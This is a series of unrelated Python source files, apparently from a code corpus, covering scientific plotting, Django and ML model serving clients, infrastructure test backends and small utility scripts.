plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL' + fig_fmt, dpi=600)
plt.close()
flt_ncoefs = 9
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
mat = sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, mat, linewidth=3, color='blue', label='W-experimental')
ic_low, ic_med, ic_high = np.percentile(sims, p_per, axis=0), np.median(sims, axis=0), np.percentile(sims, 100-p_per, axis=0)
ic_low_5, ic_high_95 = np.percentile(sims, 5, axis=0), np.percentile(sims, 95, axis=0)
ic_low = sp.signal.savgol_filter(ic_low, flt_ncoefs, 2, mode='interp')
ic_med = sp.signal.savgol_filter(ic_med, flt_ncoefs, 2, mode='interp')
ic_high = sp.signal.savgol_filter(ic_high, flt_ncoefs, 2, mode='interp')
ic_low_5 = sp.signal.savgol_filter(ic_low_5, flt_ncoefs, 2, mode='interp')
ic_high_95 = sp.signal.savgol_filter(ic_high_95, flt_ncoefs, 2, mode='interp')
plt.plot(ana_rg, ic_med, linewidth=3, color='gray', label='IC-simulated')
plt.plot(ana_rg, ic_low_5, linewidth=2, color='k', linestyle='--')
plt.plot(ana_rg, ic_high_95, linewidth=2, color='k', linestyle='--')
plt.fill_between(ana_rg, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
x_max, y_max = ana_rg[mat.argmax()], mat.max()
plt.plot((x_max, x_max), (pt_yrange[0], y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_max), (y_max, y_max), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, x_max, 400, 600, 800, 1000))
plt.yticks((-20, -10, 0, 10, y_max))
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL_sgflt' + fig_fmt, dpi=600)
plt.close()
plt.figure()
plt.ylabel('Ripley\'s L\'')
plt.xlabel('Distance [nm]')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
mat = np.gradient(sp.signal.savgol_filter(mat, flt_ncoefs, 2, mode='interp'), ana_rg[1]-ana_rg[0])
ana_rg_c = ana_rg[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
mat_c = mat[(ana_rg >= pt_dxrange[0]) & (ana_rg <= pt_dxrange[1])]
plt.plot(ana_rg_c, mat_c, linewidth=3, color='blue', label='W-experimental')
x_min, y_min = ana_rg_c[mat_c.argmin()], mat_c.min()
plt.plot((x_min, x_min), (-.1, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.plot((pt_xrange[0], x_min), (y_min, y_min), linewidth=2, marker='o', linestyle='--', color='k')
plt.xticks((0, 100, x_min, 250))
plt.yticks((-.1, y_min, 0, .2, .4))
if pt_xrange is not None:
plt.xlim(pt_dxrange)
if pt_yrange is not None:
plt.ylim((-.1, .5))
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_RipleyL_sgdif' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
if (mats_w2nd is not None) and (mats_it2nd is not None):
plt.figure()
plt.ylabel('Ripley\'s L')
plt.xlabel('Distance [nm]')
mat, sims = mats_w2nd.values()[0], sims_w2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=4, color='orange', label='W-experimental')
mat, sims = mats_it2nd.values()[0], sims_it2nd.values()[0]
plt.plot(ana_rg, mat, linewidth=4, color='springgreen', label='IT-experimental')
if pt_xrange is not None:
plt.xlim(pt_xrange)
if pt_yrange is not None:
plt.ylim(pt_yrange)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_RipleyL' + fig_fmt, dpi=600)
plt.close()
else:
print 'ERROR: organization could not be computed'
print 'Unsuccessfully terminated. (' + time.strftime("%c") + ')'
sys.exit(-1)
print '\nLoading 1st order analysis...'
with open(in_mats_w1st, 'r') as pkl:
wspace = pickle.load(pkl)
lists_count_w, tomos_count_w = wspace[0], wspace[1]
lists_hash_w, tomos_hash_w = wspace[2], wspace[3]
tomos_exp_dsts_w, tomos_sim_dsts_w, tomos_exp_fdsts_w, tomos_sim_fdsts_w = wspace[4], wspace[5], wspace[6], wspace[7]
lists_exp_dsts_w, lists_sim_dsts_w, lists_exp_fdsts_w, lists_sim_fdsts_w, lists_color_w = wspace[8], wspace[9], wspace[10], wspace[11], wspace[12]
with open(in_mats_it1st, 'r') as pkl:
wspace = pickle.load(pkl)
lists_count_it, tomos_count_it = wspace[0], wspace[1]
lists_hash_it, tomos_hash_it = wspace[2], wspace[3]
tomos_exp_dsts_it, tomos_sim_dsts_it, tomos_exp_fdsts_it, tomos_sim_fdsts_it = wspace[4], wspace[5], wspace[6], wspace[7]
lists_exp_dsts_it, lists_sim_dsts_it, lists_exp_fdsts_it, lists_sim_fdsts_it, lists_color_it = wspace[8], wspace[9], wspace[10], wspace[11], wspace[12]
print '\t\t-Plotting Histogram...'
ltomo = lists_exp_dsts_w.values()[0]
hist_bins, hist_vals_w = compute_hist(np.concatenate(np.asarray(ltomo)), ana_nbins, ana_rmax)
list_sim_dsts = lists_sim_dsts_w.values()[0]
sims_hist_vals = list()
for sim_dsts in list_sim_dsts:
sims_hist_vals.append(compute_hist(sim_dsts, ana_nbins, ana_rmax)[1])
if len(sims_hist_vals) > 0:
ic_low, ic_med, ic_high = compute_ic(p_per, np.asarray(sims_hist_vals))
plt.figure()
# plt.ylabel('Nearest neighbor distribution')
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_w, color='blue', linewidth=2, label='W-experimental', marker='o')
plt.plot(hist_bins, ic_med, 'gray', linewidth=2, label='W-simulated')
plt.fill_between(hist_bins, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
plt.xlim(0, ana_rmax)
plt.ylim(0, 0.035)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IC_histogram' + fig_fmt)
plt.close()
print '\t\t-Plotting Histogram...'
ltomo = lists_exp_dsts_it.values()[0]
hist_bins, hist_vals_it = compute_hist(np.concatenate(np.asarray(ltomo)), ana_nbins, ana_rmax)
list_sim_dsts = lists_sim_dsts_it.values()[0]
sims_hist_vals = list()
for sim_dsts in list_sim_dsts:
sims_hist_vals.append(compute_hist(sim_dsts, ana_nbins, ana_rmax)[1])
if len(sims_hist_vals) > 0:
ic_low, ic_med, ic_high = compute_ic(p_per, np.asarray(sims_hist_vals))
plt.figure()
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_it, color='blue', linewidth=2, label='IT-experimental', marker='o')
plt.plot(hist_bins, ic_med, 'gray', linewidth=2, label='IT-simulated')
plt.fill_between(hist_bins, ic_low, ic_high, alpha=0.5, color='gray', edgecolor='w')
plt.xlim(0, ana_rmax)
plt.ylim(0, 0.035)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_IC_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Nearest Neighbor Probability')
plt.xlabel('Distance [nm]')
plt.plot(hist_bins, hist_vals_w, color='blue', linestyle='-', marker='o', linewidth=2, label='W-experimental')
plt.plot(hist_bins, hist_vals_it, color='blue', linestyle='--', marker='s', linewidth=2, label='IT-experimental')
plt.xlim(0, ana_rmax)
plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_IT_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Probability')
plt.xlabel('Nearest Neighbor Distance [nm]')
H, B = np.histogram(np.concatenate(np.asarray(lists_exp_dsts_w.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=True)
plt.bar(B[:-1], 10.*H, width=10, color='b', linewidth=2)
# plt.hist(np.concatenate(np.asarray(lists_exp_dsts_w.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=10)
# plt.plot(hist_bins, hist_vals_w, color='blue', linestyle='-', marker='o', linewidth=2, label='W-experimental')
# plt.xlim(0, ana_rmax)
# plt.ylim(0, 0.02)
# plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/W_histogram' + fig_fmt)
plt.close()
plt.figure()
plt.ylabel('Probability')
plt.xlabel('Nearest Neighbor Distance [nm]')
H, B = np.histogram(np.concatenate(np.asarray(lists_exp_dsts_it.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=True)
plt.bar(B[:-1], 10.*H, width=10, color='b', linewidth=2)
# plt.hist(np.concatenate(np.asarray(lists_exp_dsts_it.values()[0])), bins=np.arange(0,ana_rmax,10), range=None, normed=10)
# plt.plot(hist_bins, hist_vals_it, color='blue', linestyle='-', marker='s', linewidth=2, label='IT-experimental')
# plt.xlim(0, ana_rmax)
# plt.ylim(0, 0.02)
# plt.xticks(hist_bins)
# plt.legend()
plt.tight_layout()
if fig_fmt is None:
plt.show(block=True)
else:
plt.savefig(out_dir + '/IT_histogram' + fig_fmt)
plt.close()
print 'Successfully terminated. (' + time.strftime("%c") + ')'
| StarcoderdataPython |
6404997 | address_district = {
'1':'District 1',
'2':'District 2',
'3':'District 3',
'4':'District 4',
'5':'District 5',
'6':'District 6',
'7':'District 7',
'8':'District 8',
'9':'District 9',
'10':'District 10',
'11':'District 11',
'12':'District 12'
}
address_street = {
'1':'Cao Thắng',
'2':'Lý Thường Kiệt',
'3':'Phạm Văn Đồng',
'4':'Trần Hưng Đạo',
'5':'Lê Thánh Tôn',
'6':'Nguyễn Hữu Cảnh',
'7':'Lý Tự Trọng',
'8':'Nguyễn Du',
'9':'Cô Bắc',
'10':'Cô Giang',
}
realestate_type = {
'1': 'Land',
'2' : 'House' ,
'3' : 'Apartment/Penhouse',
'4':'Project',
'5':'Factory',
'6':'Others',
'7':'Motel',
'8':'Flat'
}
transaction_type = {
'1': 'Sell',
'2' : 'Rent' ,
'3' : 'Transfer',
'4':'Sell or Rent',
'5':'Sell or Rent (Rent Price Available)',
'6':'Sell or Rent (Rent Price Not Available)',
'7':'Other'
}
position_street = {
'1': 'Frontispiece',
'2' : 'Cornor Of Frontispiece' ,
'3' : 'Wide Alley',
'4':'Narrow Alley',
'5':'Two Front Alley',
'6':'Other'
}
legal = {
'1': 'Undefined',
'2' : 'Ownership certificate Not Available',
'3' : 'Ownership certificate Available'
} | StarcoderdataPython |
54443 | import random
import pandas
import numpy as np
from sklearn import metrics, cross_validation
import tensorflow as tf
from tensorflow.contrib import layers
from tensorflow.contrib import learn
random.seed(42)
"""
data = pandas.read_csv('titanic_train.csv')
X = data[["Embarked"]]
y = data["Survived"]
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2, random_state=42)
embarked_classes = X_train["Embarked"].unique()
n_classes = len(embarked_classes) + 1
print('Embarked has next classes: ', embarked_classes)
"""
X_train = ["s", "a", "s", "d"]
cat_processor = learn.preprocessing.CategoricalProcessor()
X_train = np.array(list(cat_processor.fit_transform(X_train)))
t = X_train[0][0]
result = cat_processor.vocabularies_[0].reverse(t)
| StarcoderdataPython |
8188108 | <reponame>Wsine/filterfuzz
import os
import torch
def load_model(opt):
if 'cifar' in opt.dataset:
model_hub = 'chenyaofo/pytorch-cifar-models'
model_name = f'{opt.dataset}_{opt.model}'
model = torch.hub.load(model_hub, model_name, pretrained=True)
return model
elif opt.model == 'convstn':
from models.gtsrb.convstn import Net
model = Net()
ckp = torch.load(
os.path.join('models', 'gtsrb', 'model_40.pth'),
map_location=torch.device('cpu')
)
model.load_state_dict(ckp)
return model
else:
raise ValueError('Invalid dataset name')
| StarcoderdataPython |
8183995 | from testinfra.backend import base
from ConfigParser import SafeConfigParser
from winrm.protocol import Protocol
from winrm import Session
import base64
class WinrmBackend(base.BaseBackend):
NAME = "winrm"
def __init__(self, name, winrm_config=None, *args, **kwargs):
self.name, self.user = self.parse_containerspec(name)
self.winrm_config = winrm_config
self._client = None
super(WinrmBackend, self).__init__(self.name, *args, **kwargs)
@property
def client(self):
if self._client is None:
parser = SafeConfigParser()
parser.read(self.winrm_config)
username = parser.get('winrm', 'username')
password = parser.get('winrm', 'password')
transport = parser.get('winrm', 'transport')
secure_transport = 'ssl' if parser.get('winrm', 'secure_transport') == "true" else transport
host = Session._build_url(self.hostname, secure_transport)
self._client = Protocol(endpoint=host, username=username, password=password, transport=transport, server_cert_validation='ignore')
return self._client
def run(self, command, *args, **kwargs):
shell_id = self.client.open_shell()
encoded_script = base64.b64encode(command.encode("utf_16_le"))
command_id = self._client.run_command(shell_id, "powershell -encodedcommand %s" % encoded_script)
stdout, stderr, rc = self._client.get_command_output(shell_id, command_id)
self._client.cleanup_command(shell_id, command_id)
self._client.close_shell(shell_id)
return self.result(rc, self.encode(command), stdout, stderr)
| StarcoderdataPython |
1818235 | <reponame>ccpn1988/TIR<gh_stars>1-10
# BAIXAS A RECEBER
import unittest
from tir import Webapp
from datetime import datetime
DateSystem = datetime.today().strftime('%d/%m/%Y')
class FINA070(unittest.TestCase):
@classmethod
def setUpClass(inst):
inst.oHelper = Webapp()
inst.oHelper.Setup("SIGAFIN", DateSystem, "T1", "D MG 01 ", "06")
inst.oHelper.Program("FINA070")
def test_FINA070_CT193(self):
prefixo = "FIN"
titulo = "FIN002152"
parcela = " "
tipo = "NF "
banco = "001"
agencia = "001"
conta = "001"
data = "21/06/2019"
self.oHelper.AddParameter("MV_BR10925", "", "2", "2", "2")
self.oHelper.AddParameter("MV_JURTIPO", "", "L", "L", "L")
self.oHelper.AddParameter("MV_FINJRTP", "", "2", "2", "2")
self.oHelper.AddParameter("MV_LJMULTA", "", "0.10", "0.10", "0.10")
self.oHelper.SetParameters()
self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("+ Multa", "0,00")
self.oHelper.CheckResult("= Valor Recebido", "10000,00")
self.oHelper.SetButton("Cancelar")
self.oHelper.SetButton("Baixar")
self.oHelper.WaitShow("Baixa de Titulos - BAIXAR")
data = "28/06/2019"
self.oHelper.SetValue("Mot.Baixa", "NORMAL")
self.oHelper.SetValue("Banco", banco)
self.oHelper.SetValue("Agência", agencia)
self.oHelper.SetValue("Conta", conta)
self.oHelper.SetValue("Data Receb.", data)
self.oHelper.SetValue("Data Crédito", data)
self.oHelper.CheckResult("+ Multa", "10,00")
self.oHelper.CheckResult("= Valor Recebido", "10010,00")
self.oHelper.SetButton("Salvar")
self.oHelper.AssertTrue()
@classmethod
def tearDownClass(inst):
inst.oHelper.TearDown()
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
8044022 | # Using readlines()
input = open('input.txt', 'r')
lines = input.readlines()
horizontal = 0
depth = 0
aim = 0
for line in lines:
[command, num] = line.split()
num = int(num)
if command == "forward":
horizontal += num
depth += num * aim
elif command == "down":
aim += num
elif command == "up":
aim -= num
print(horizontal, depth, horizontal*depth)
| StarcoderdataPython |
199009 | #!/usr/bin/python
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
import time
import numpy as np
import pandas as pd
import os
from builtins import range
from PIL import Image
import grpc
# Drop "from src.core import" because the import hierarchy in proto files
# will be removed in Makefile.clients
from tensorrtserver.api import api_pb2
from tensorrtserver.api import grpc_service_pb2
from tensorrtserver.api import grpc_service_pb2_grpc
from tensorrtserver.api import model_config_pb2
from tensorrtserver.api import request_status_pb2
from tensorrtserver.api import server_status_pb2
FLAGS = None
def _log(*args, **kwargs):
print("[Client]", *args, **kwargs)
def model_dtype_to_np(model_dtype):
if model_dtype == model_config_pb2.TYPE_BOOL:
return np.bool
elif model_dtype == model_config_pb2.TYPE_INT8:
return np.int8
elif model_dtype == model_config_pb2.TYPE_INT16:
return np.int16
elif model_dtype == model_config_pb2.TYPE_INT32:
return np.int32
elif model_dtype == model_config_pb2.TYPE_INT64:
return np.int64
elif model_dtype == model_config_pb2.TYPE_UINT8:
return np.uint8
elif model_dtype == model_config_pb2.TYPE_UINT16:
return np.uint16
elif model_dtype == model_config_pb2.TYPE_FP16:
return np.float16
elif model_dtype == model_config_pb2.TYPE_FP32:
return np.float32
elif model_dtype == model_config_pb2.TYPE_FP64:
return np.float64
return None
def parse_model(status, model_name, batch_size, verbose=False):
"""
Check the configuration of a model to make sure it meets the
requirements for an image classification network (as expected by
this client)
"""
server_status = status.server_status
if model_name not in server_status.model_status.keys():
raise Exception("unable to get status for '" + model_name + "'")
status = server_status.model_status[model_name]
config = status.config
if len(config.input) != 1:
raise Exception("expecting 1 input, got " + len(config.input))
if len(config.output) != 1:
raise Exception("expecting 1 output, got " + len(config.output))
input = config.input[0]
output = config.output[0]
if output.data_type != model_config_pb2.TYPE_FP32:
raise Exception("expecting output datatype to be TYPE_FP32, model '" +
model_name + "' output type is " +
model_config_pb2.DataType.Name(output.data_type))
# Output is expected to be a vector. But allow any number of
# dimensions as long as all but 1 is size 1 (e.g. { 10 }, { 1, 10
# }, { 10, 1, 1 } are all ok).
non_one_cnt = 0
for dim in output.dims:
if dim > 1:
non_one_cnt += 1
if non_one_cnt > 1:
raise Exception("expecting model output to be a vector")
# Model specifying maximum batch size of 0 indicates that batching
# is not supported and so the input tensors do not expect an "N"
# dimension (and 'batch_size' should be 1 so that only a single
# image instance is inferred at a time).
max_batch_size = config.max_batch_size
if max_batch_size == 0:
if batch_size != 1:
raise Exception("batching not supported for model '" + model_name + "'")
else: # max_batch_size > 0
if batch_size > max_batch_size:
raise Exception("expecting batch size <= " + max_batch_size +
" for model '" + model_name + "'")
# Model input must have 3 dims, either CHW or HWC
if len(input.dims) != 3:
raise Exception("expecting input to have 3 dimensions, model '" +
model_name + "' input has " << len(input.dims))
if ((input.format != model_config_pb2.ModelInput.FORMAT_NCHW) and
(input.format != model_config_pb2.ModelInput.FORMAT_NHWC)):
raise Exception("unexpected input format " + model_config_pb2.ModelInput.Format.Name(input.format) +
", expecting " +
model_config_pb2.ModelInput.Format.Name(model_config_pb2.ModelInput.FORMAT_NCHW) +
" or " +
model_config_pb2.ModelInput.Format.Name(model_config_pb2.ModelInput.FORMAT_NHWC))
if input.format == model_config_pb2.ModelInput.FORMAT_NHWC:
h = input.dims[0]
w = input.dims[1]
c = input.dims[2]
else:
c = input.dims[0]
h = input.dims[1]
w = input.dims[2]
output_size = 1
for dim in output.dims:
output_size = output_size * dim
output_size = output_size * np.dtype(model_dtype_to_np(output.data_type)).itemsize
return (input.name, output.name, c, h, w, input.format, model_dtype_to_np(input.data_type), output_size)
def preprocess(img, format, dtype, c, h, w, scaling):
"""
Pre-process an image to meet the size, type and format
requirements specified by the parameters.
"""
#np.set_printoptions(threshold='nan')
if c == 1:
sample_img = img.convert('L')
else:
sample_img = img.convert('RGB')
resized_img = sample_img.resize((h, w), Image.BILINEAR)
resized = np.array(resized_img)
if resized.ndim == 2:
resized = resized[:,:,np.newaxis]
typed = resized.astype(dtype)
if scaling == 'INCEPTION':
scaled = (typed / 128) - 1
elif scaling == 'VGG':
if c == 1:
scaled = typed - np.asarray((128,), dtype=dtype)
else:
scaled = typed - np.asarray((123, 117, 104), dtype=dtype)
else:
scaled = typed
# Swap to CHW if necessary
if format == model_config_pb2.ModelInput.FORMAT_NCHW:
ordered = np.transpose(scaled, (2, 0, 1))
else:
ordered = scaled
# Channels are in RGB order. Currently model configuration data
# doesn't provide any information as to other channel orderings
# (like BGR) so we just assume RGB.
return ordered
def postprocess(results, files, idx, batch_size, num_classes, verbose=False):
"""
Post-process results to show classifications.
"""
show_all = verbose or ((batch_size == 1) and (num_classes > 1))
if show_all:
if idx == 0:
print("Output probabilities:")
print("batch {}:".format(idx))
if len(results) != 1:
raise Exception("expected 1 result, got " + str(len(results)))
batched_result = results[0].batch_classes
if len(batched_result) != batch_size:
raise Exception("expected " + str(batch_size) +
" results, got " + str(len(batched_result)))
# For each result in the batch count the top prediction. Since we
# used the same image for every entry in the batch we expect the
# top prediction to be the same for each entry... but this code
# doesn't assume that.
counts = dict()
predictions = dict()
for (index, result) in enumerate(batched_result):
label = result.cls[0].label
if label not in counts:
counts[label] = 0
counts[label] += 1
predictions[label] = result.cls[0]
# If requested, print all the class results for the entry
if show_all:
if (index >= len(files)):
index = len(files) - 1
# Top 1, print compactly
if len(result.cls) == 1:
print("Image '{}': {} ({}) = {}".format(
files[index], result.cls[0].idx,
result.cls[0].label, result.cls[0].value))
else:
print("Image '{}':".format(files[index]))
for cls in result.cls:
print(" {} ({}) = {}".format(cls.idx, cls.label, cls.value))
# Summary
print("Prediction totals:")
for (label, cnt) in counts.items():
cls = predictions[label]
print("\tcnt={}\t({}) {}".format(cnt, cls.idx, cls.label))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose', action="store_true", required=False, default=False,
help='Enable verbose output')
parser.add_argument('-m', '--model-name', type=str, required=True,
help='Name of model')
parser.add_argument('-x', '--model-version', type=str, required=False,
help='Version of model. Default is to use latest version.')
parser.add_argument('-b', '--batch-size', type=int, required=False, default=1,
help='Batch size. Default is 1.')
parser.add_argument('-c', '--classes', type=int, required=False, default=1,
help='Number of class results to report. Default is 1.')
parser.add_argument('-s', '--scaling', type=str, choices=['NONE', 'INCEPTION', 'VGG'],
required=False, default='NONE',
help='Type of scaling to apply to image pixels. Default is NONE.')
parser.add_argument('-u', '--url', type=str, required=False, default='localhost:8001',
help='Inference server URL. Default is localhost:8001.')
parser.add_argument('-p', '--preprocessed', type=str, required=False,
metavar='FILE', help='Write preprocessed image to specified file.')
parser.add_argument('--result-name', type=str, required=False,
help='Path to parquet file')
parser.add_argument('image_filename', type=str, nargs='?', default=None,
help='Input image.')
FLAGS = parser.parse_args()
# Create gRPC stub for communicating with the server
channel = grpc.insecure_channel(FLAGS.url)
grpc_stub = grpc_service_pb2_grpc.GRPCServiceStub(channel)
# Prepare request for Status gRPC
request = grpc_service_pb2.StatusRequest(model_name=FLAGS.model_name)
# Call and receive response from Status gRPC
response = grpc_stub.Status(request)
# Make sure the model matches our requirements, and get some
# properties of the model that we need for preprocessing
input_name, output_name, c, h, w, format, dtype, output_size = parse_model(
response, FLAGS.model_name, FLAGS.batch_size, FLAGS.verbose)
# Prepare request for Infer gRPC
# The meta data part can be reused across requests
request = grpc_service_pb2.InferRequest()
request.model_name = FLAGS.model_name
if FLAGS.model_version is None:
FLAGS.model_version = "" # using lastest version
request.version = FLAGS.model_version
request.meta_data.batch_size = FLAGS.batch_size
output_message = api_pb2.InferRequestHeader.Output()
output_message.name = output_name
output_message.byte_size = output_size
output_message.cls.count = FLAGS.classes
request.meta_data.output.extend([output_message])
multiple_inputs = False
batched_filenames = []
responses = []
if os.path.isdir(FLAGS.image_filename):
files = [f for f in os.listdir(FLAGS.image_filename)
if os.path.isfile(os.path.join(FLAGS.image_filename, f))]
multiple_inputs = (len(files) > 1)
input_bytes = None
requests = []
filenames = []
# Place every 'batch_size' number of images into one request
# and send it via AsyncRun() API. If the last request doesn't have
# 'batch_size' input tensors, pad it with the last input tensor.
cnt = 0
for idx in range(len(files)):
filenames.append(files[idx])
img = Image.open(os.path.join(FLAGS.image_filename, files[idx]))
input_tensor = preprocess(img, format, dtype, c, h, w, FLAGS.scaling)
# This field can not be set until input tensor is obtained
if len(request.meta_data.input) == 0:
request.meta_data.input.add(
name=input_name, byte_size=input_tensor.size * input_tensor.itemsize)
if input_bytes is None:
input_bytes = input_tensor.tobytes()
else:
input_bytes += input_tensor.tobytes()
cnt += 1
if (idx + 1 == len(files)):
while (cnt != FLAGS.batch_size):
input_bytes += input_tensor.tobytes()
cnt += 1
# Send the request and reset input_tensors
if cnt >= FLAGS.batch_size:
del request.raw_input[:]
request.raw_input.extend([input_bytes])
# Call and receive future response from async Infer gRPC
requests.append(grpc_stub.Infer.future(request))
input_bytes = None
cnt = 0
batched_filenames.append(filenames)
filenames = []
# Get results by send order
for request in requests:
responses.append(request.result())
else:
batched_filenames.append([FLAGS.image_filename])
# Load and preprocess the image
img = Image.open(FLAGS.image_filename)
input_tensor = preprocess(img, format, dtype, c, h, w, FLAGS.scaling)
request.meta_data.input.add(
name=input_name, byte_size=input_tensor.size * input_tensor.itemsize)
if FLAGS.preprocessed is not None:
with open(preprocessed, "w") as file:
file.write(input_tensor.tobytes())
# Need 'batch_size' copies of the input tensor...
input_bytes = input_tensor.tobytes()
for b in range(FLAGS.batch_size-1):
input_bytes += input_tensor.tobytes()
request.raw_input.extend([input_bytes])
# Call and receive response from Infer gRPC
durations = []
for _ in range(2000):
start = time.perf_counter()
responses.append(grpc_stub.Infer(request))
end = time.perf_counter()
duration_ms = (end - start) * 1000
durations.append(duration_ms)
responses.append(grpc_stub.Infer(request))
# print(responses[0].request_status)
# Save Data
df = pd.DataFrame({"duration_ms": durations})
df.to_parquet('10.pq')
mean, p99 = df["duration_ms"].mean(), np.percentile(durations, 99)
_log(f"Mean Latency: {mean}, P99: {p99}")
# TODO: Update postprocess
#for idx in range(len(responses)):
# postprocess(responses[idx].meta_data.output, batched_filenames[idx],
# idx, FLAGS.batch_size, FLAGS.classes,
# FLAGS.verbose or multiple_inputs)
| StarcoderdataPython |
11236820 | <reponame>sircodesalittle/MOOC-TIme
from django.shortcuts import render
from django.contrib.auth.models import User, Group
from rest_framework import viewsets
from .models import Course, Work, IntervalSession
from api.serializers import UserSerializer, \
GroupSerializer, \
CourseSerializer, \
WorkSerializer, \
IntervalSessionSerializer
from django.http import JsonResponse, FileResponse
def get_possible_work_events(request, id):
print(id)
target_course = Course.objects.get(id=id)
return JsonResponse(target_course.get_possible_events(), safe=False)
def get_calendar(request):
course_id = request.GET['course_id']
if course_id is not None:
course = Course.objects.all().filter(id=course_id)
print(course)
response = FileResponse(open(course[0].get_calendar(), 'rb'))
response['Content-Disposition'] = 'attachment; filename="MOOCCalendar.ics"'
return response
class UserViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
class CourseViewSet(viewsets.ModelViewSet):
queryset = Course.objects.all()
serializer_class = CourseSerializer
class WorkViewSet(viewsets.ModelViewSet):
serializer_class = WorkSerializer
def get_queryset(self):
queryset = Work.objects.all().order_by('due_date')
course_id = self.request.query_params.get('course_id', None)
if course_id is not None:
queryset = queryset.filter(course__id=course_id)
return queryset
class IntervalSessionViewSet(viewsets.ModelViewSet):
queryset = IntervalSession.objects.all()
serializer_class = IntervalSessionSerializer
| StarcoderdataPython |
5038717 | <reponame>daxreyes/fastapi-svelte-experiments
from .msg import Msg
from .token import Token, TokenPayload
from .user import User, UserCreate, UserInDB, UserUpdate
from .item import (
Item,
ItemCreate,
ItemInDB,
ItemUpdate,
ItemOut,
)
| StarcoderdataPython |
5060911 | #!/usr/bin/env python3
import json
import os
import sys
import random
from pathlib import Path
def main(num_objects, output_path):
"""
:param num_objects: number of json objects to create in the output file
:param output_path: the path to the output file
"""
num_objects = int(num_objects)
with open(output_path, 'w') as outfile:
outfile.write("[")
for index in range(num_objects):
product = {}
product['id'] = index
product['cost'] = random.uniform(0, 100.0)
product['cost_components'] = []
num_components = random.randint(0, 100)
for x in range(num_components):
product['cost_components'].append(random.uniform(0, 52.5))
json.dump(product, outfile)
if (index+1)<num_objects:
outfile.write(",")
outfile.write("]")
outfile.close()
